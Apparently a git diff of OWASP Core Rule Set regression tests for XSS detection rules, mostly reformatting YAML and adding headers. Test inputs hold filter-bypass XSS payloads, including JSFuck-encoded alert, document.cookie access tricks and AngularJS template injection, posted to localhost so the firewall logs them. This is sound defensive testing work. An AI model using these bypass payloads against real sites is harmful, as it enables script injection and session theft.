"абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + output: + no_log_contains: id "941310" + - test_title: 941310-11 + desc: Negative using real world Russian example in utf-8, variant + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + output: + no_log_contains: id "941310" + - test_title: 941310-12 + desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + output: + log_contains: id "941310" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee2f5b67fa..fc08f81e27 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941320.yaml - tests: - - - test_title: 941320-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941320.yaml +tests: + - test_title: 941320-1 desc: "XSS Attack - HTML Tag Handler" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=\">" - output: - log_contains: id "941330" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941330" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index fc28bc3884..44f60d4598 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,39 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941340.yaml - tests: - - - test_title: 941340-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941340.yaml +tests: + - test_title: 941340-1 desc: "IE XSS Filters - Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - - test_title: 941340-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_title: 941340-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 7ba9d65399..75721a2ab1 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,24 +1,22 @@ --- - meta: - author: fgsch - enabled: true - name: 941350.yaml - description: Test rule 941350 - tests: - - - test_title: 941350-1 - desc: GH issue 1514 - stages: - - - stage: +meta: + author: fgsch + enabled: true + name: 941350.yaml + description: Test rule 941350 +tests: + - test_title: 941350-1 + desc: GH issue 1514 + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 - uri: /xx?id=%25252bADw-script%25252bAD4- + uri: /xx?id=%252bADw-script%252bAD4- headers: - Accept: "*/*" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Host: localhost - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" output: log_contains: id "941350" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index bc28995dc9..3f2e77f391 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,58 +1,58 @@ --- - meta: - author: "Christian Folini" - description: None - enabled: true - name: 941360.yaml - tests: - - - test_title: 941360-1 +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - - test_title: 941360-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - - test_title: 941360-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index bf7ab161d5..b1e5f3839f 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,172 +1,167 @@ --- - meta: - author: "Andrea Menin" - description: None - enabled: true - name: 941370.yaml - tests: - - - test_title: 941370-1 +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941370.yaml +tests: + - test_title: 941370-1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-2 desc: "Bypass using comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-3 desc: "Bypass using JavaScript global variables" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - test_title: 941370-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - - - test_title: 941370-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index 6da8602f9e..48c4ed5900 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,26 +1,24 @@ --- - meta: - author: "Franziska Buehler" - description: None - enabled: true - name: 941380.yaml - tests: - - - test_title: 941380-1 +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 941380.yaml +tests: + - test_title: 941380-1 desc: "AngularJS client side template injection detection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "*/*" - User-Agent: "ModSecurity CRS 3 Tests" - method: GET - port: 80 - uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml new file mode 100644 index 0000000000..fd208ee7f8 --- /dev/null +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -0,0 +1,151 @@ +--- +meta: + author: "Franziska Buehler, Xhoenix" + description: None + enabled: true + name: 941390.yaml +tests: + - test_title: 941390-1 + desc: "JavaScript method setInterval(code, 1)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=setInterval%28code%2C%201%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-2 + desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-3 + desc: "JavaScript method eval('2 + 2')" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=eval%28%272%20%2B%202%27%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-4 + desc: "JavaScript constructor new Function()" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=new%20Function%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-5 + desc: "JavaScript call alert" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=alert%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-6 + desc: "JavaScript call atob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=atob%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-7 + desc: "JavaScript call btoa" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=btoa%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-8 + desc: "JavaScript call prompt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=prompt%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-9 + desc: "JavaScript call confirm" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=confirm%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml new file mode 100644 index 0000000000..80807d767e --- /dev/null +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -0,0 +1,119 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941400.yaml +tests: + - test_title: 941400-1 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-2 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-3 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-4 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-5 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 